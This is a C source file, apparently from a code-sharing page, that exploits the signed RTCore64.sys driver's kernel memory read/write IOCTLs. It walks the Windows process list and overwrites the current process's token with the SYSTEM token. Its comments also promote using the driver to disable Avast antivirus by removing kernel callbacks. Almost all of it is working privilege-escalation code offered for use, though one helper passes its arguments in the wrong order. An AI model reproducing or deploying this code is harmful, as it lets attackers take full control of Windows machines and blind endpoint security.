// RTCore64.sys allows arbitrary read/write, driver has a valid certificate.
// [ / ]: You can use this driver to make 'Avast' completely useless by removing the kernel callback.
/* Before all, there is an important thing to note: there are some offsets, but these offsets may vary with different Windows winver versions: '0x448 = ActiveProcessLinks', '0x4B8 = Token', '0x440 = UniqueProcessId'
/* --- RTCORE64.H --- */
typedef struct _RTCORE64_READ_MEMORY
{
BYTE pad0[ 8 ];
DWORD64 address;
BYTE pad1[ 8 ];
DWORD readsize;
DWORD value;
BYTE pad2[ 16 ];
} RTCORE64_READ_MEMORY;
typedef struct _RTCORE64_WRITE_MEMORY
{
BYTE pad0[ 8 ];
DWORD64 address;
BYTE pad1[ 8 ];
DWORD readsize;
DWORD value;
BYTE pad2[ 16 ];
} RTCORE64_WRITE_MEMORY;
DWORD ReadMemoryPrimitive( HANDLE hDevice, DWORD64 address, DWORD size )
{
RTCORE64_READ_MEMORY read_memory = { 0 };
read_memory.address = address;
read_memory.readsize = size;
DWORD bytes = 0;
// 0x80002048 = RTCORE64_READ_MEMORY_IOCTL
//
DeviceIoControl( hDevice, 0x80002048, &read_memory,
sizeof( read_memory ), &read_memory, sizeof( read_memory ), &bytes, NULL );
return read_memory.value;
}
DWORD64 ReadMemoryDWORD64( HANDLE hDevice, DWORD64 address )
{
return ( DWORD64 ) ReadMemoryPrimitive( hDevice, 4, address + 4 ) << 32 | ReadMemoryPrimitive( hDevice, 4, address );
}
void WriteMemoryPrimitive( HANDLE hDevice, DWORD64 address, DWORD size, DWORD value )
{
RTCORE64_WRITE_MEMORY write_memory = { 0 };
write_memory.address = address;
write_memory.readsize = size;
write_memory.value = value;
DWORD bytes = 0;
// 0x8000204C = RTCORE64_WRITE_MEMORY_IOCTL
//
DeviceIoControl( hDevice, 0x8000204C, &write_memory,
sizeof( write_memory ), &write_memory, sizeof( write_memory ), &bytes, NULL );
}
void WriteMemoryDWORD64( HANDLE hDevice, DWORD64 address, DWORD64 value )
{
WriteMemoryPrimitive( hDevice, 4, address, value & 0xFFFFFFFF );
WriteMemoryPrimitive( hDevice, 4, address + 4, value >> 32 );
}
/* --- MAIN.C --- */
void NT_AUTHORITY_SYSTEM( void )
{
HANDLE hDevice = CreateFileA( "\\\\.\\RTCore64", GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL );
if ( hDevice == INVALID_HANDLE_VALUE || hDevice == NULL )
exit( 0 );
HMODULE ntoskrnl = LoadLibraryA( "ntoskrnl.exe" );
if ( ntoskrnl == NULL )
{
CloseHandle( hDevice );
exit( 0 );
}
DWORD64 PsInitialSystemProcessOffset = ( DWORD64 )
GetProcAddress( ntoskrnl, "PsInitialSystemProcess" ) - ( DWORD64 ) ntoskrnl;
DWORD64 PsInitialSystemProcessAddress = ReadMemoryDWORD64(
hDevice, GetNtoskrnlBaseAddress() + PsInitialSystemProcessOffset );
DWORD currentProcesID = GetCurrentProcessId();
DWORD64 currentProcessAddress = PsInitialSystemProcessAddress + 0x448;
DWORD64 systemProcessToken = ReadMemoryDWORD64(
hDevice, PsInitialSystemProcessAddress + 0x4B8 ) & ~15;
do
{
DWORD64 processAddress = currentProcessAddress - 0x448;
DWORD64 UniqueProcessId = ReadMemoryDWORD64( hDevice, processAddress + 0x440 );
if ( UniqueProcessId == ( DWORD64 ) ( currentProcesID ) ) break;
currentProcessAddress = ReadMemoryDWORD64( hDevice, processAddress + 0x448 );
} while ( currentProcessAddress != PsInitialSystemProcessAddress + 0x448 );
currentProcessAddress -= 0x448;
DWORD64 CurrentProcessTokenReferenceCounter =
ReadMemoryDWORD64( hDevice, currentProcessAddress + 0x4B8 ) & 15;
WriteMemoryDWORD64( hDevice, currentProcessAddress + 0x4B8, CurrentProcessTokenReferenceCounter | systemProcessToken );
CloseHandle( hDevice );
FreeLibrary( ntoskrnl );
}
Polish
English